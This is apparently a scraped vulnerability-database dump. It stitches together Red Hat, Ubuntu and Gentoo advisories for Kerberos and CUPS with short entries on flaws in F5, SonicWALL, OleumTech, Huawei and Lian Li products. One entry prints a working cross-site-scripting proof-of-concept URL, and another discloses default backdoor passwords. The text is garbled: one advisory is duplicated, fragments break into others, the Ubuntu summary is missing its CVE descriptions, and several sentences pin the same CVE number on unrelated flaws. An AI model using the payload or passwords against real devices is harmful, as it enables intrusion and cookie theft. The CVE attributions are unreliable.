krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
ppc64:
krb5-debuginfo-1.12.2-14.el7.ppc.rpm
krb5-debuginfo-1.12.2-14.el7.ppc64.rpm
krb5-devel-1.12.2-14.el7.ppc.rpm
krb5-devel-1.12.2-14.el7.ppc64.rpm
krb5-libs-1.12.2-14.el7.ppc.rpm
krb5-libs-1.12.2-14.el7.ppc64.rpm
krb5-pkinit-1.12.2-14.el7.ppc64.rpm
krb5-server-1.12.2-14.el7.ppc64.rpm
krb5-server-ldap-1.12.2-14.el7.ppc64.rpm
krb5-workstation-1.12.2-14.el7.ppc64.rpm
s390x:
krb5-debuginfo-1.12.2-14.el7.s390.rpm
krb5-debuginfo-1.12.2-14.el7.s390x.rpm
krb5-devel-1.12.2-14.el7.s390.rpm
krb5-devel-1.12.2-14.el7.s390x.rpm
krb5-libs-1.12.2-14.el7.s390.rpm
krb5-libs-1.12.2-14.el7.s390x.rpm
krb5-pkinit-1.12.2-14.el7.s390x.rpm
krb5-server-1.12.2-14.el7.s390x.rpm
krb5-server-ldap-1.12.2-14.el7.s390x.rpm
krb5-workstation-1.12.2-14.el7.s390x.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-4341
https://access.redhat.com/security/cve/CVE-2014-4342
https://access.redhat.com/security/cve/CVE-2014-4343
https://access.redhat.com/security/cve/CVE-2014-4344
https://access.redhat.com/security/cve/CVE-2014-4345
https://access.redhat.com/security/cve/CVE-2014-5352
https://access.redhat.com/security/cve/CVE-2014-5353
https://access.redhat.com/security/cve/CVE-2014-9421
https://access.redhat.com/security/cve/CVE-2014-9422
https://access.redhat.com/security/cve/CVE-2014-9423
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi
gZD8EL2lSaLXnIQxca8zLTg=
=aK0y
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6) - i386, x86_64
3.
It was found that if a KDC served multiple realms, certain requests could
cause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)
These updated krb5 packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes
| VAR-201410-0037 | CVE-2013-7408 | F5 BIG-IP Analytics Vulnerability in |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
F5 BIG-IP Analytics 11.x before 11.4.0 uses a predictable session cookie, which makes it easier for remote attackers to have unspecified impact by guessing the value.
An attacker can exploit this issue to gain access to the affected application.
BIG-IP Analytics 11.0.0 through 11.3.0 are affected. F5 BIG-IP Analytics is a set of web application performance analysis software developed by F5 Corporation of the United States. The software provides detailed analysis of performance metrics such as transactions per second, server latency, web page load time, and response throughput, among others
| VAR-201407-0223 | CVE-2014-5024 | plural Dell SonicWALL Product sgms/panelManager Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter. Multiple Dell SonicWALL Products are prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following products are vulnerable:
Dell SonicWALL Global Management System
Dell SonicWALL Analyzer
Dell SonicWALL Universal Managemnet Appliance. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA is a set of universal management device software. I. VULNERABILITY
-------------------------
Reflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701
II. BACKGROUND
-------------------------
Dell® SonicWALL® provides intelligent network security and data protection
solutions that enable customers and partners to dynamically secure,
control, and scale their global networks.
III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in DELL SonicWALL GMS.
The code injection is done through the parameter "node_id" in the page
“/sgms/panelManager?level=1&typeOfUnits=2&node_name=GlobalView&node_id=(HERE
XSS)”
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “node_ID” correctly.
https://10.200.210.222:8443/sgms/panelManager?level=1&typeOfUnits=2&node_name=GlobalView&node_id=aaaaaaa'</script><body
onload=alert(document.cookie)>&panelidz=0,4#tabs-4
V.
VI. SYSTEMS AFFECTED
-------------------------
Tested DELL SonicWALL Analyzer v7.2 (build 7220.1700)
VII. SOLUTION
-------------------------
https://support.software.dell.com/product-notification/128245
By William Costa
william.costa@gmail.com
| VAR-201408-0298 | CVE-2014-4343 | MIT Kerberos 5 of lib/gssapi/spnego/spnego_mech.c of SPNEGO Initiator init_ctx_reselect Function double memory vulnerability |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Double free vulnerability in the init_ctx_reselect function in the SPNEGO initiator in lib/gssapi/spnego/spnego_mech.c in MIT Kerberos 5 (aka krb5) 1.10.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via network traffic that appears to come from an intended acceptor, but specifies a security mechanism different from the one proposed by the initiator. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions.
Versions prior to Kerberos 5 1.12.2 are vulnerable.
CVE-2014-4343
An unauthenticated remote attacker with the ability to spoof packets
appearing to be from a GSSAPI acceptor can cause a double-free
condition in GSSAPI initiators (clients) which are using the SPNEGO
mechanism, by returning a different underlying mechanism than was
proposed by the initiator.
CVE-2014-4344
An unauthenticated or partially authenticated remote attacker can
cause a NULL dereference and application crash during a SPNEGO
negotiation by sending an empty token as the second or later context
token from initiator to acceptor.
For the stable distribution (wheezy), these problems have been fixed in
version 1.10.1+dfsg-5+deb7u2.
For the unstable distribution (sid), these problems have been fixed in
version 1.12.1+dfsg-7. ==========================================================================
Ubuntu Security Notice USN-2310-1
August 11, 2014
krb5 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Kerberos. This issue only affected Ubuntu
12.04 LTS. This
issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected
Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
(CVE-2014-4344)
Tomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon
incorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
krb5-admin-server 1.12+dfsg-2ubuntu4.2
krb5-kdc 1.12+dfsg-2ubuntu4.2
krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2
krb5-otp 1.12+dfsg-2ubuntu4.2
krb5-pkinit 1.12+dfsg-2ubuntu4.2
krb5-user 1.12+dfsg-2ubuntu4.2
libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2
libgssrpc4 1.12+dfsg-2ubuntu4.2
libk5crypto3 1.12+dfsg-2ubuntu4.2
libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2
libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2
libkdb5-7 1.12+dfsg-2ubuntu4.2
libkrad0 1.12+dfsg-2ubuntu4.2
libkrb5-3 1.12+dfsg-2ubuntu4.2
libkrb5support0 1.12+dfsg-2ubuntu4.2
Ubuntu 12.04 LTS:
krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5
krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5
krb5-user 1.10+dfsg~beta1-2ubuntu0.5
libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5
libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5
libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5
libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5
libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5
libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5
Ubuntu 10.04 LTS:
krb5-admin-server 1.8.1+dfsg-2ubuntu0.13
krb5-kdc 1.8.1+dfsg-2ubuntu0.13
krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13
krb5-pkinit 1.8.1+dfsg-2ubuntu0.13
krb5-user 1.8.1+dfsg-2ubuntu0.13
libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13
libgssrpc4 1.8.1+dfsg-2ubuntu0.13
libk5crypto3 1.8.1+dfsg-2ubuntu0.13
libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13
libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13
libkdb5-4 1.8.1+dfsg-2ubuntu0.13
libkrb5-3 1.8.1+dfsg-2ubuntu0.13
libkrb5support0 1.8.1+dfsg-2ubuntu0.13
In general, a standard system update will make all the necessary changes.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-crypt/mit-krb5 < 1.13 >= 1.13
Description
===========
Multiple vulnerabilities have been discovered in MIT Kerberos 5. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All MIT Kerberos 5 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-crypt/mit-krb5-1.13"
References
==========
[ 1 ] CVE-2014-4341
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4341
[ 2 ] CVE-2014-4343
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4343
[ 3 ] CVE-2014-4345
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4345
[ 4 ] CVE-2014-5351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5351
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-53.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: krb5 security, bug fix and enhancement update
Advisory ID: RHSA-2015:0439-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html
Issue date: 2015-03-05
CVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343
CVE-2014-4344 CVE-2014-4345 CVE-2014-5352
CVE-2014-5353 CVE-2014-9421 CVE-2014-9422
CVE-2014-9423
=====================================================================
1. Summary:
Updated krb5 packages that fix multiple security issues, several bugs, and
add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
Kerberos is a networked authentication system which allows clients and
servers to authenticate to each other with the help of a trusted third
party, the Kerberos KDC.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
A NULL pointer dereference flaw was found in the MIT Kerberos SPNEGO
acceptor for continuation tokens. A remote, unauthenticated attacker could
use this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)
A buffer overflow was found in the KADM5 administration server (kadmind)
when it was used with an LDAP back end for the KDC database. A remote,
authenticated attacker could potentially use this flaw to execute arbitrary
code on the system running kadmind. (CVE-2014-4345)
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5
library processed valid context deletion tokens. An attacker able to make
an application using the GSS-API library (libgssapi) call the
gss_process_context_token() function could use this flaw to crash that
application. (CVE-2014-5352)
If kadmind were used with an LDAP back end for the KDC database, a remote,
authenticated attacker with the permissions to set the password policy
could crash kadmind by attempting to use a named ticket policy object as a
password policy for a principal. (CVE-2014-5353)
A double-free flaw was found in the way MIT Kerberos handled invalid
External Data Representation (XDR) data. An authenticated user could use
this flaw to crash the MIT Kerberos administration server (kadmind), or
other applications using Kerberos libraries, using specially crafted XDR
packets. (CVE-2014-9421)
It was found that the MIT Kerberos administration server (kadmind)
incorrectly accepted certain authentication requests for two-component
server principal names. A remote attacker able to acquire a key with a
particularly named principal (such as "kad/x") could use this flaw to
impersonate any user to kadmind, and perform administrative actions as that
user. (CVE-2014-9422)
An information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS
implementation (libgssrpc) handled certain requests. An attacker could send
a specially crafted request to an application using libgssrpc to disclose a
limited portion of uninitialized memory used by that application.
(CVE-2014-9423)
Two buffer over-read flaws were found in the way MIT Kerberos handled
certain requests. A remote, unauthenticated attacker able to inject packets
into a client or server application's GSSAPI session could use either of
these flaws to crash the application. An
attacker able to spoof packets to appear as though they are from an GSSAPI
acceptor could use this flaw to crash a client application that uses MIT
Kerberos. (CVE-2014-4343)
Red Hat would like to thank the MIT Kerberos project for reporting the
CVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT
Kerberos project acknowledges Nico Williams for helping with the analysis
of CVE-2014-5352.
The krb5 packages have been upgraded to upstream version 1.12, which
provides a number of bug fixes and enhancements, including:
* Added plug-in interfaces for principal-to-username mapping and verifying
authorization to user accounts.
* When communicating with a KDC over a connected TCP or HTTPS socket, the
client gives the KDC more time to reply before it transmits the request to
another server. (BZ#1049709, BZ#1127995)
This update also fixes multiple bugs, for example:
* The Kerberos client library did not recognize certain exit statuses that
the resolver libraries could return when looking up the addresses of
servers configured in the /etc/krb5.conf file or locating Kerberos servers
using DNS service location. The library could treat non-fatal return codes
as fatal errors. Now, the library interprets the specific return codes
correctly. (BZ#1084068, BZ#1109102)
In addition, this update adds various enhancements. Among others:
* Added support for contacting KDCs and kpasswd servers through HTTPS
proxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)
4. Solution:
All krb5 users are advised to upgrade to these updated packages, which
correct these issues and add these enhancements.
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1084068 - ipv6 address handling in krb5.conf
1102837 - Please backport improved GSSAPI mech configuration
1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly
1109919 - Backport https support into libkrb5
1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext
1118347 - ksu non-functional, gets invalid argument copying cred cache
1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens
1121789 - CVE-2014-4343: use-after-free crash in SPNEGO
1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators
1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens
1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure
1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001)
1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update
1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name
1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001)
1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001)
1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001)
1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001)
1184629 - kinit loops on principals on unknown error
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
ppc64:
krb5-debuginfo-1.12.2-14.el7.ppc.rpm
krb5-debuginfo-1.12.2-14.el7.ppc64.rpm
krb5-devel-1.12.2-14.el7.ppc.rpm
krb5-devel-1.12.2-14.el7.ppc64.rpm
krb5-libs-1.12.2-14.el7.ppc.rpm
krb5-libs-1.12.2-14.el7.ppc64.rpm
krb5-pkinit-1.12.2-14.el7.ppc64.rpm
krb5-server-1.12.2-14.el7.ppc64.rpm
krb5-server-ldap-1.12.2-14.el7.ppc64.rpm
krb5-workstation-1.12.2-14.el7.ppc64.rpm
s390x:
krb5-debuginfo-1.12.2-14.el7.s390.rpm
krb5-debuginfo-1.12.2-14.el7.s390x.rpm
krb5-devel-1.12.2-14.el7.s390.rpm
krb5-devel-1.12.2-14.el7.s390x.rpm
krb5-libs-1.12.2-14.el7.s390.rpm
krb5-libs-1.12.2-14.el7.s390x.rpm
krb5-pkinit-1.12.2-14.el7.s390x.rpm
krb5-server-1.12.2-14.el7.s390x.rpm
krb5-server-ldap-1.12.2-14.el7.s390x.rpm
krb5-workstation-1.12.2-14.el7.s390x.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-4341
https://access.redhat.com/security/cve/CVE-2014-4342
https://access.redhat.com/security/cve/CVE-2014-4343
https://access.redhat.com/security/cve/CVE-2014-4344
https://access.redhat.com/security/cve/CVE-2014-4345
https://access.redhat.com/security/cve/CVE-2014-5352
https://access.redhat.com/security/cve/CVE-2014-5353
https://access.redhat.com/security/cve/CVE-2014-9421
https://access.redhat.com/security/cve/CVE-2014-9422
https://access.redhat.com/security/cve/CVE-2014-9423
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi
gZD8EL2lSaLXnIQxca8zLTg=
=aK0y
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6) - i386, x86_64
3.
It was found that if a KDC served multiple realms, certain requests could
cause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)
These updated krb5 packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes
| VAR-201407-0712 | No CVE | MTS MBlaze Ultra Wi-Fi ZTE AC3633 Multiple Security Vulnerabilities |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
MTS MBlaze Ultra Wi-Fi ZTE AC3633 is a wireless modem.
MTS MBlaze Ultra Wi-Fi ZTE AC3633 has a cross-site request forgery vulnerability, a security bypass vulnerability, an authentication bypass vulnerability, and an information disclosure vulnerability. A remote attacker could use these vulnerabilities to perform administrator actions, obtain sensitive information, bypass certain security restrictions, or gain access to affected devices. Other attacks are also possible
| VAR-201407-0741 | No CVE | Lian Li Network Attached Storage Multiple Security Vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Lian Li NAS 'cacert.pem' has a hard-coded FTP server key vulnerability that allows remote attackers to access the FTP server. Lian Li NAS multiple scripts have multiple cross-site request forgery vulnerabilities, which allow context-sensitive attackers to initiate cross-site request forgery attacks by enticing users to use the following specially crafted links. Lian Li Network Attached Storage is a NAS network storage device of Lian Li.
Lian Li NAS has a backdoor account vulnerability. The MySQL account has a password of "123456" and the account of "daemon" has a password of "123456". This allows remote attackers to gain privileged access to the device. Attackers can use these vulnerabilities to obtain sensitive information, bypass authentication mechanisms, and perform unauthorized operations. A password-disclosure vulnerability
2. An authentication-bypass vulnerability
3. This may aid in further attacks
| VAR-201407-0229 | CVE-2014-2360 | OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Module Vulnerable to arbitrary code execution |
CVSS V2: 7.5 CVSS V3: - Severity: MEDIUM |
OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules allow remote attackers to execute arbitrary code via packets that report a high battery voltage. OleumTech is a California company that provides wireless remote monitoring equipment for industrial environments. OleumTech WIO DH2 Wireless Gateway is prone to a remote denial-of-service vulnerability.
Successful exploits may allow an attacker to cause an affected device to crash, resulting in a denial-of-service condition. OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules are both products of OleumTech Corporation in the United States
| VAR-201407-0230 | CVE-2014-2361 | OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Module Vulnerabilities in which communication is spoofed |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules, when BreeZ is used, do not require authentication for reading the site security key, which allows physically proximate attackers to spoof communication by obtaining this key after use of direct hardware access or manual-setup mode. Supplementary information : CWE Vulnerability type by CWE-320: Key Management Errors ( Key management error ) Has been identified. OleumTech is a California company that provides wireless remote monitoring equipment for industrial environments. This key cannot be read remotely when the data system is running. Multiple OleumTech Products are prone to a local security-bypass vulnerability.
Attackers with physical access to the device may exploit this issue to bypass certain security restrictions and perform unauthorized actions
| VAR-201407-0438 | CVE-2014-2968 | Huawei E355 contains a stored cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the web interface on the Huawei E355 CH1E355SM modem with software 21.157.37.01.910 and Web UI 11.001.08.00.03 allows remote attackers to inject arbitrary web script or HTML via an SMS message. Huawei Provided by E355 Contains a cross-site scripting vulnerability. Huawei Provided by E355 Is a wireless router with a web interface for management and other services. Huawei E355 is a wireless network card product. Huawei E355 is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
E355 running firmware versions CH1E355SM is vulnerable; other versions may also be affected. Huawei E355 CH1E355SM modem and Web UI are both products of China Huawei (Huawei)
| VAR-201407-0231 | CVE-2014-2362 | OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Module Vulnerabilities that can break cryptographic protection mechanisms |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules rely exclusively on a time value for entropy in key generation, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by predicting the time of project creation. Supplementary information : CWE Vulnerability type by CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) ( Weak in cryptography PRNG Use of ) Has been identified. OleumTech is a California company that provides wireless remote monitoring equipment for industrial environments. Because the site security key is generated using the time64() function in the standard C library, the attacker exploits the vulnerability to obtain the site security key.
Attackers can leverage this weakness to aid in brute-force attacks. Other attacks are also possible. A remote attacker could exploit this vulnerability to compromise password protection by predicting when an item was created
| VAR-201407-0413 | CVE-2014-5029 | CUPS of Web Vulnerability to read arbitrary files in the interface |
CVSS V2: 1.5 CVSS V3: - Severity: LOW |
The web interface in CUPS 1.7.4 allows local users in the lp group to read arbitrary files via a symlink attack on a file in /var/cache/cups/rss/ and language[0] set to null. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-3537. CUPS is prone to a local privilege-escalation vulnerability.
An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Other attacks may also be possible.
Note: This issue is the result of an incomplete fix for the issue described in 68788 (CUPS Web Interface CVE-2014-3537 Local Privilege Escalation Vulnerability).
An attacker with local access could potentially exploit this issue to gain elevated privileges.
CUPS 1.7.4 and earlier versions are vulnerable. The system is based on the Internet Printing Protocol (IPP) and provides most PostScript and raster printer services. ============================================================================
Ubuntu Security Notice USN-2341-1
September 08, 2014
cups vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
CUPS could be made to expose sensitive information, leading to privilege
escalation.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
cups 1.7.2-0ubuntu1.2
Ubuntu 12.04 LTS:
cups 1.5.3-0ubuntu8.5
Ubuntu 10.04 LTS:
cups 1.4.3-1ubuntu1.13
